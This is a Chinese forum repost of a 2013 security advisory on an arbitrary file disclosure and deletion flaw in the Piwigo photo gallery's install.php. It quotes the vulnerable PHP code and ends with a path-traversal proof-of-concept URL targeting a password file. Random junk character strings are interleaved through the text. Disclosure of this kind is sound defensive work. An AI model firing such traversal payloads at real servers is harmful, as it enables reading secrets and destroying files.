Piwigo任意文件泄露和任意文件删除漏洞

admin

Piwigo是用PHP编写的相册脚本。

1 Y  w: _6 c: G) l' w+ N9 ^+ BPiwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
7 Z6 e. I! q! \! q6 f====================================================================
/install.php:
1 D" d+ X, z' j. k0 X  \, n0 [& U: C  ]-------------
. K8 D6 b, ]: o( A113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
114: {
115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
: t- U$ W4 S4 @. q116:   header('Cache-Control: no-cache, must-revalidate');
117:   header('Pragma: no-cache');
118:   header('Content-Disposition: attachment; filename="database.inc.php"');
2 G, d; O% x- C  g% S' g8 d5 L) ]119:   header('Content-Transfer-Encoding: binary');
120:   header('Content-Length: '.filesize($filename));
+ `8 L6 G" f: Y4 S: H9 A121:   echo file_get_contents($filename);
122:   unlink($filename);
& m) V" ]' k3 w6 R( A3 E  A9 f) V; X123:   exit();
+ Z  d. }% ]8 R) A1 L124: }
  H' o4 E. k6 k* g/ O====================================================================
9 u* C/ x6 W  Q$ K9 C5 F
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
9 G% ?0 M8 z$ V; M           Apache 2.4.2 (Win32)
8 A+ u; B: I$ ^4 ~' o7 |- |           PHP 5.4.4
           MySQL 5.5.25a

* p& o, m& Z" j' }0 {Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
3 i( E7 h) f8 N& Z; V/ y                            @zeroscience

$ T# e! S8 y  p9 n2 Z; [6 W( ZAdvisory ID: ZSL-2013-5127
& v$ Z. w( J2 V5 H7 VAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
' H" o+ f1 g7 {# g% L2 X9 @+ MVendor Patch: http://piwigo.org/bugs/view.php?id=2843

2 B! ~& a. y) A15.02.2013

( o  r# n+ ]) w3 s$ F9 o--
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt

2 p0 q2 K" z2 b  L